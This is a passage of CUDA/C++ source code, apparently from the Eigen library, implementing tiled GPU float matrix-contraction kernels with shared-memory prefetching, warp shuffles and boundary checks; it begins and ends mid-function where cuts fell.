if (base_m + 63 < m_size && base_n + 63 < n_size) {
EigenContractionKernelInternal<Scalar, Index, LhsMapper, RhsMapper, OutputMapper, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size);
} else {
EigenContractionKernelInternal<Scalar, Index, LhsMapper, RhsMapper, OutputMapper, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size);
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool CHECK_LHS_BOUNDARY,
bool CHECK_RHS_BOUNDARY>
__device__ EIGEN_STRONG_INLINE void
EigenFloatContractionKernelInternal16x16(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, float2 lhs_shmem2[][16],
float2 rhs_shmem2[][8], const Index m_size,
const Index n_size, const Index k_size,
const Index base_m, const Index base_n) {
typedef float Scalar;
// prefetch registers
float4 lhs_pf0, rhs_pf0;
float4 results[4];
for (int i=0; i < 4; i++) {
results[i].x = results[i].y = results[i].z = results[i].w = 0;
}
#define prefetch_lhs(reg, row, col) \
if (!CHECK_LHS_BOUNDARY) { \
if (col < k_size) { \
reg =lhs.loadPacket<Unaligned>(row, col); \
} \
} else { \
if (col < k_size) { \
if (row + 3 < m_size) { \
reg =lhs.loadPacket<Unaligned>(row, col); \
} else if (row + 2 < m_size) { \
reg.x =lhs(row + 0, col); \
reg.y =lhs(row + 1, col); \
reg.z =lhs(row + 2, col); \
} else if (row + 1 < m_size) { \
reg.x =lhs(row + 0, col); \
reg.y =lhs(row + 1, col); \
} else if (row < m_size) { \
reg.x =lhs(row + 0, col); \
} \
} \
} \
Index lhs_vert = base_m+threadIdx.x*4;
for (Index k = 0; k < k_size; k += 16) {
lhs_pf0 = internal::pset1<float4>(0);
rhs_pf0 = internal::pset1<float4>(0);
Index lhs_horiz = threadIdx.y+k;
prefetch_lhs(lhs_pf0, lhs_vert, lhs_horiz)
Index rhs_vert = k+(threadIdx.x%4)*4;
Index rhs_horiz0 = (threadIdx.x>>2)+threadIdx.y*4+base_n;
if (!CHECK_RHS_BOUNDARY) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if (rhs_vert + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
} else {
if (rhs_horiz0 < n_size) {
if ((rhs_vert + 3) < k_size) {
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if ((rhs_vert + 2) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if ((rhs_vert + 1) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
}
}
float x1, x2 ;
// the following can be a bitwise operation..... some day.
if((threadIdx.x%8) < 4) {
x1 = rhs_pf0.y;
x2 = rhs_pf0.w;
} else {
x1 = rhs_pf0.x;
x2 = rhs_pf0.z;
}
x1 = __shfl_xor(x1, 4);
x2 = __shfl_xor(x2, 4);
if((threadIdx.x%8) < 4) {
rhs_pf0.y = x1;
rhs_pf0.w = x2;
} else {
rhs_pf0.x = x1;
rhs_pf0.z = x2;
}
// We have 64 features.
// Row 0 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 0, 1.
// Row 1 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 2, 3.
// ...
// Row 31 -> times (0, 4, 8, 12, 1, 5, 9, 13) for features 62, 63
// Row 32 -> times (2, 6, 10, 14, 3, 7, 11, 15) for features 0, 1
// ...
rhs_shmem2[(threadIdx.x>>3)+ threadIdx.y*2][threadIdx.x%8] = make_float2(rhs_pf0.x, rhs_pf0.y);
rhs_shmem2[(threadIdx.x>>3)+ threadIdx.y*2+32][threadIdx.x%8] = make_float2(rhs_pf0.z, rhs_pf0.w);
// Row 0 (time 0) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// Row 1 (time 1) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// ...
// Row 15 (time 15) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61)
// Row 16 (time 0) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63)
// ...
lhs_shmem2[threadIdx.y][threadIdx.x] = make_float2(lhs_pf0.x, lhs_pf0.y);
lhs_shmem2[threadIdx.y+16][threadIdx.x] = make_float2(lhs_pf0.z, lhs_pf0.w);
#define add_vals(fl1, fl2, fr1, fr2)\
results[0].x += fl1.x * fr1.x;\
results[0].y += fl1.y * fr1.x;\
results[0].z += fl2.x * fr1.x;\
results[0].w += fl2.y * fr1.x;\
\
results[1].x += fl1.x * fr1.y;\
results[1].y += fl1.y * fr1.y;\
results[1].z += fl2.x * fr1.y;\
results[1].w += fl2.y * fr1.y;\
\
results[2].x += fl1.x * fr2.x;\
results[2].y += fl1.y * fr2.x;\
results[2].z += fl2.x * fr2.x;\
results[2].w += fl2.y * fr2.x;\
\
results[3].x += fl1.x * fr2.y;\
results[3].y += fl1.y * fr2.y;\
results[3].z += fl2.x * fr2.y;\
results[3].w += fl2.y * fr2.y;\
__syncthreads();
// Do the multiplies.
#pragma unroll
for (int koff = 0; koff < 16; koff ++) {
// 32 x threads.
float2 fl1 = lhs_shmem2[koff][threadIdx.x];
float2 fl2 = lhs_shmem2[koff + 16][threadIdx.x];
int start_feature = threadIdx.y * 4;
float2 fr1 = rhs_shmem2[(start_feature>>1) + 32*((koff%4)/2)][koff/4 + (koff%2)*4];
float2 fr2 = rhs_shmem2[(start_feature>>1) + 1 + 32*((koff%4)/2)][koff/4 + (koff%2)*4];
add_vals(fl1, fl2, fr1, fr2)
}
__syncthreads();
}
#undef prefetch_lhs
#undef add_vals
Index horiz_base = threadIdx.y*4+base_n;
if (!CHECK_LHS_BOUNDARY && !CHECK_RHS_BOUNDARY) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (!CHECK_RHS_BOUNDARY) {
// CHECK LHS
if (lhs_vert + 3 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (lhs_vert + 2 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
}
} else if (lhs_vert + 1 < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
}
} else if (lhs_vert < m_size) {
for (int i = 0; i < 4; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
}
}
} else if (!CHECK_LHS_BOUNDARY) {
// CHECK RHS
/*
int ncols_rem = fminf(n_size- horiz_base, 4);
for (int i = 0; i < ncols_rem; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}*/
for (int i = 0; i < 4; i++) {
if (horiz_base+i < n_size) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
} else {
// CHECK both boundaries.
for (int i = 0; i < 4; i++) {
if (horiz_base+i < n_size) {
if (lhs_vert < m_size)
output(lhs_vert, horiz_base + i) = results[i].x;
if (lhs_vert + 1 < m_size)
output(lhs_vert + 1, horiz_base + i) = results[i].y;
if (lhs_vert + 2 < m_size)
output(lhs_vert + 2, horiz_base + i) = results[i].z;
if (lhs_vert + 3 < m_size)
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper, bool CHECK_LHS_BOUNDARY,
bool CHECK_RHS_BOUNDARY>
__device__ EIGEN_STRONG_INLINE void
EigenFloatContractionKernelInternal(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output, float2 lhs_shmem2[][32],
float2 rhs_shmem2[][8], const Index m_size,
const Index n_size, const Index k_size,
const Index base_m, const Index base_n) {
typedef float Scalar;
// prefetch registers
float4 lhs_pf0, lhs_pf1, lhs_pf2, lhs_pf3;
float4 rhs_pf0, rhs_pf1;
float4 results[8];
for (int i=0; i < 8; i++) {
results[i].x = results[i].y = results[i].z = results[i].w = 0;
}
Index lhs_vert = base_m+threadIdx.x*4+(threadIdx.y%4)*32;
for (Index k = 0; k < k_size; k += 32) {
lhs_pf0 = internal::pset1<float4>(0);
lhs_pf1 = internal::pset1<float4>(0);
lhs_pf2 = internal::pset1<float4>(0);
lhs_pf3 = internal::pset1<float4>(0);
rhs_pf0 = internal::pset1<float4>(0);
rhs_pf1 = internal::pset1<float4>(0);
if (!CHECK_LHS_BOUNDARY) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
lhs_pf3 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
}
} else {
// just CHECK_LHS_BOUNDARY
if (lhs_vert + 3 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
lhs_pf3 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
lhs_pf2 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
lhs_pf1 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0 =lhs.loadPacket<Unaligned>(lhs_vert, (threadIdx.y/4+k));
}
} else if (lhs_vert + 2 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf2.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
lhs_pf3.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+24));
lhs_pf3.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf2.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf1.z =lhs(lhs_vert + 2, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf0.z =lhs(lhs_vert + 2, (threadIdx.y/4+k));
}
} else if (lhs_vert + 1 < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
lhs_pf3.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf2.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf1.y =lhs(lhs_vert + 1, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf0.y =lhs(lhs_vert + 1, (threadIdx.y/4+k));
}
} else if (lhs_vert < m_size) {
if ((threadIdx.y/4+k+24) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
lhs_pf3.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+24));
} else if ((threadIdx.y/4+k+16) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
lhs_pf2.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+16));
} else if ((threadIdx.y/4+k+8) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
lhs_pf1.x =lhs(lhs_vert + 0, (threadIdx.y/4+k+8));
} else if ((threadIdx.y/4+k) < k_size) {
lhs_pf0.x =lhs(lhs_vert + 0, (threadIdx.y/4+k));
}
}
}
__syncthreads();
Index rhs_vert = k+threadIdx.x*4;
Index rhs_horiz0 = threadIdx.y*2+base_n;
Index rhs_horiz1 = threadIdx.y*2+1+base_n;
if (!CHECK_RHS_BOUNDARY) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
rhs_pf1 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz1);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
rhs_pf1.z = rhs(rhs_vert + 2, rhs_horiz1);
} else if (rhs_vert + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
}
} else {
if (rhs_horiz1 < n_size) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
rhs_pf1 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz1);
} else if (rhs_vert + 2 < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
rhs_pf1.z = rhs(rhs_vert + 2, rhs_horiz1);
} else if (k+threadIdx.x*4 + 1 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
rhs_pf1.y = rhs(rhs_vert + 1, rhs_horiz1);
} else if (k+threadIdx.x*4 < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf1.x = rhs(rhs_vert, rhs_horiz1);
}
} else if (rhs_horiz0 < n_size) {
if ((rhs_vert + 3) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0 = rhs.loadPacket<Unaligned>(rhs_vert, rhs_horiz0);
} else if ((rhs_vert + 2) < k_size) {
// just CHECK_RHS_BOUNDARY
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
rhs_pf0.z = rhs(rhs_vert + 2, rhs_horiz0);
} else if ((rhs_vert + 1) < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
rhs_pf0.y = rhs(rhs_vert + 1, rhs_horiz0);
} else if (rhs_vert < k_size) {
rhs_pf0.x = rhs(rhs_vert, rhs_horiz0);
}
}
}
__syncthreads();
// Loaded. Do computation
// Row 0 -> times (0, 4, 8, .. 28) for features 0, 1.
// Row 1 -> times (0, 4, 8, .. 28) for features 2, 3.
// ..
// Row 31 -> times (0, 4, 8, .. 28) for features 62, 63
rhs_shmem2[threadIdx.y][threadIdx.x] = make_float2(rhs_pf0.x, rhs_pf1.x);
// Row 32 -> times (1, 5, 9, .. 29) for features 0, 1.
// Row 33 -> times (1, 5, 9, .. 29) for features 2, 3.
// ..
rhs_shmem2[threadIdx.y+32][threadIdx.x] = make_float2(rhs_pf0.y, rhs_pf1.y);
// Row 64 -> times (2, 6, 10, .. 30) for features 0, 1.
// Row 65 -> times (2, 6, 10, .. 30) for features 2, 3.
rhs_shmem2[threadIdx.y+64][threadIdx.x] = make_float2(rhs_pf0.z, rhs_pf1.z);
// Row 96 -> times (3, 7, 11, .. 31) for features 0, 1.
// Row 97 -> times (3, 7, 11, .. 31) for features 2, 3.
rhs_shmem2[threadIdx.y+96][threadIdx.x] = make_float2(rhs_pf0.w, rhs_pf1.w);
// LHS.
// Row 0 (time 0) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61) .. (124, 125)
// Row 1 (time 1) -> features (0, 1), (4, 5), .. (28, 29), (32, 33), .. (60, 61) .. (124, 125)
// ...
// Row 8 (time 0) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63) .. (126, 127)
// Row 15 (time 7) -> features (2, 3), (6, 7), .. (30, 31), (34, 35), .. (62, 63) .. (126, 127)
#define add_vals(a_feat1, a_feat2, f1, f2, f3, f4)\
results[0].x += a_feat1.x * f1.x;\
results[1].x += a_feat1.x * f1.y;\
results[2].x += a_feat1.x * f2.x;\
results[3].x += a_feat1.x * f2.y;\
results[4].x += a_feat1.x * f3.x;\
results[5].x += a_feat1.x * f3.y;\
results[6].x += a_feat1.x * f4.x;\
results[7].x += a_feat1.x * f4.y;\
\
results[0].y += a_feat1.y * f1.x;\
results[1].y += a_feat1.y * f1.y;\
results[2].y += a_feat1.y * f2.x;\
results[3].y += a_feat1.y * f2.y;\
results[4].y += a_feat1.y * f3.x;\
results[5].y += a_feat1.y * f3.y;\
results[6].y += a_feat1.y * f4.x;\
results[7].y += a_feat1.y * f4.y;\
\
results[0].z += a_feat2.x * f1.x;\
results[1].z += a_feat2.x * f1.y;\
results[2].z += a_feat2.x * f2.x;\
results[3].z += a_feat2.x * f2.y;\
results[4].z += a_feat2.x * f3.x;\
results[5].z += a_feat2.x * f3.y;\
results[6].z += a_feat2.x * f4.x;\
results[7].z += a_feat2.x * f4.y;\
\
results[0].w += a_feat2.y * f1.x;\
results[1].w += a_feat2.y * f1.y;\
results[2].w += a_feat2.y * f2.x;\
results[3].w += a_feat2.y * f2.y;\
results[4].w += a_feat2.y * f3.x;\
results[5].w += a_feat2.y * f3.y;\
results[6].w += a_feat2.y * f4.x;\
results[7].w += a_feat2.y * f4.y;\
lhs_shmem2[threadIdx.y/4][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf0.x, lhs_pf0.y);
lhs_shmem2[threadIdx.y/4+8][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf1.x, lhs_pf1.y);
lhs_shmem2[threadIdx.y/4+16][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf2.x, lhs_pf2.y);
lhs_shmem2[threadIdx.y/4+24][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf3.x, lhs_pf3.y);
lhs_shmem2[threadIdx.y/4 + 32][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf0.z, lhs_pf0.w);
lhs_shmem2[threadIdx.y/4 + 40][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf1.z, lhs_pf1.w);
lhs_shmem2[threadIdx.y/4 + 48][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf2.z, lhs_pf2.w);
lhs_shmem2[threadIdx.y/4 + 56][threadIdx.x+(threadIdx.y%4)*8] = make_float2(lhs_pf3.z, lhs_pf3.w);
__syncthreads();
// Do the multiplies.
#pragma unroll
for (int koff = 0; koff < 32; koff ++) {
float2 a3 = lhs_shmem2[koff][threadIdx.x + (threadIdx.y % 4) * 8];
float2 a4 = lhs_shmem2[koff + 32][threadIdx.x + (threadIdx.y % 4) * 8];
// first feature is at (threadIdx.y/4) * 8 last is at start + 8.
int start_feature = (threadIdx.y / 4) * 8;
float2 br1 = rhs_shmem2[start_feature/2 + (koff % 4) * 32][koff/4];
float2 br2 = rhs_shmem2[start_feature/2 + 1 + (koff % 4) * 32][koff/4];
float2 br3 = rhs_shmem2[start_feature/2 + 2 + (koff % 4) * 32][koff/4];
float2 br4 = rhs_shmem2[start_feature/2 + 3 + (koff % 4) * 32][koff/4];
add_vals(a3, a4, br1, br2, br3, br4)
}
__syncthreads();
} // end loop over k
__syncthreads();
Index horiz_base = (threadIdx.y/4)*8+base_n;
if (!CHECK_LHS_BOUNDARY && !CHECK_RHS_BOUNDARY) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (!CHECK_RHS_BOUNDARY) {
if (lhs_vert + 3 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
} else if (lhs_vert + 2 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
}
} else if (lhs_vert + 1 < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
}
} else if (lhs_vert < m_size) {
for (int i = 0; i < 8; i++) {
output(lhs_vert, horiz_base + i) = results[i].x;
}
}
} else if (!CHECK_LHS_BOUNDARY) {
// CHECK BOUNDARY_B
for (int i = 0; i < 8; i++) {
if (horiz_base + i < n_size) {
output(lhs_vert, horiz_base + i) = results[i].x;
output(lhs_vert + 1, horiz_base + i) = results[i].y;
output(lhs_vert + 2, horiz_base + i) = results[i].z;
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
} else {
// CHECK both boundaries.
for (int i = 0; i < 8; i++) {
if (horiz_base + i < n_size) {
if (lhs_vert < m_size)
output(lhs_vert, horiz_base + i) = results[i].x;
if (lhs_vert + 1 < m_size)
output(lhs_vert + 1, horiz_base + i) = results[i].y;
if (lhs_vert + 2 < m_size)
output(lhs_vert + 2, horiz_base + i) = results[i].z;
if (lhs_vert + 3 < m_size)
output(lhs_vert + 3, horiz_base + i) = results[i].w;
}
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(256)
EigenFloatContractionKernel(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ float2 lhs_shmem[64*32];
__shared__ float2 rhs_shmem[128*8];
typedef float2 LHS_MEM[64][32];
typedef float2 RHS_MEM[128][8];
typedef float2 LHS_MEM16x16[32][16];
typedef float2 RHS_MEM16x16[64][8];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 128 * m_block_idx;
const Index base_n = 64 * n_block_idx;
bool check_rhs = (base_n + 63) >= n_size;
bool check_lhs128 = (base_m + 127) >= m_size;
if (!check_rhs) {
if (!check_lhs128) {
// >= 128 rows left
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, false, false>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, true, false>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
}
} else {
if (!check_lhs128) {
// >= 128 rows left
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, false, true>(
